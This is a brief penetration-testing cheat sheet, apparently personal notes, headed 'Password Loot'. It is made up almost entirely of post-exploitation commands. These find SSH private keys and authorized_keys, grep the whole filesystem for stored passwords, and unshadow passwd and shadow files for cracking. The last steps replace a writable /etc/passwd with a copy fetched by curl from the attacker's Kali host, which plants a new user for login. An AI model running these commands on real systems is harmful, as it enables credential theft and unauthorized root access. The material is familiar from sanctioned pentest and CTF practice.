Password Loot
# Locationg SSH Keys
cat /home/<user>/.ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
chmod 600 id_rsa
# Finding Passwords # TAKES TIMEEE
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
# Getting Shadow and passwd file both
unshadow <passwd file> <shadown file> > unshadowed.txt
# If password writing is visible
-> It's pwfeedback attack
# Writable passwd file + cp command
ls -la /etc/shadow
ls -la /etc/passwd # See if you can write into /etc/passwd
# On Kali,
cp /etc/passwd passwd1
# Append chiya username to passwd1 file and cat /etc/passwd1 to see if its correct.
nano passwd1
# On Victim Machine, replacing the passwd file.
curl http://<KALI IP>:<PORT>/passwd1 -o /etc/passwd
Now Login using SSH or Simply SU chiya.
Last updated
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